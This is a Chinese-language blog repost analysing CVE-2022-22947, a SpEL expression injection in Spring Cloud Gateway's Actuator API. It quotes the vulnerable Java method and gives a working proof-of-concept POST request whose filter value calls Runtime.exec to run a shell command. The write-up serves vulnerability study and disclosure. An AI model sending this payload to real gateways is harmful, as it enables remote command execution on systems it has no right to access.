其他分享
首页 > 其他分享> > [CVE-2022-22947]Spring Cloud Gateway Actuator API SpEL表达式注入命令执行

[CVE-2022-22947]Spring Cloud Gateway Actuator API SpEL表达式注入命令执行

作者:互联网

一、背景

    Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令。

二、漏洞分析

ShortcutConfigurable.java :

static Object getValue(SpelExpressionParser parser, BeanFactory beanFactory, String entryValue) {
	Object value;
	String rawValue = entryValue;
	if (rawValue != null) {
		rawValue = rawValue.trim();
	}
	if (rawValue != null && rawValue.startsWith("#{") && entryValue.endsWith("}")) {
		// assume it's spel
		StandardEvaluationContext context = new StandardEvaluationContext();
		context.setBeanResolver(new BeanFactoryResolver(beanFactory));
		Expression expression = parser.parseExpression(entryValue, new TemplateParserContext());
		value = expression.getValue(context);
	}
	else {
		value = entryValue;
	}
	return value;
}

StandardEvaluationContext允许任意的表达式被调用。

三、漏洞概念复现POC

POST /actuator/gateway/routes/hacktest HTTP/1.1
{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
  }],
"uri": "http://example.com",
"order": 0
}

来源:

vulhub/README.zh-cn.md at master · vulhub/vulhub · GitHub

标签:rawValue,Spring,value,SpEL,API,entryValue,new,String
来源: https://blog.csdn.net/weixin_42353842/article/details/123246359